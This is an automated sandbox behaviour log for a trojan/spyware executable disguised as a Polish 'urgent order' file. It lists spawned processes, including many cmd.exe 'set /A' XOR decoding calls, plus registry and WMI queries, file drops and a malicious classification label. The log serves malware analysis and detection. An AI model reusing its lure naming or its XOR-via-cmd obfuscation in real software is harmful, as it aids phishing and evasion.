            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x0E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7F^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x22^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x71^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x39^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x26^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x7F^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x3B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x05^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x2E^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x67^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: unknown unknown
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd.exe /c set /A "0x6B^75"
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeCode function: 1_2_004030D9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,GetModuleHandleA,CharNextA,LdrInitializeThunk,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,LdrInitializeThunk,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,
            Source: C:\Windows\SysWOW64\cmd.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: C:\Users\user\PacifisterneJump to behavior
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeFile created: C:\Users\user\AppData\Local\Temp\nsw80C6.tmpJump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@400/11@3/3
            Source: C:\Users\user\Desktop\Pilne zamowienie nr5363582 UTECH Maszyny i Urzadzenia Techniczne Jaroslaw Koenig sp. k..exeCode function: 1_2_0040205E LdrInitializeThunk,CoCreateInstance,MultiByteToWideChar,LdrInitializeThunk,
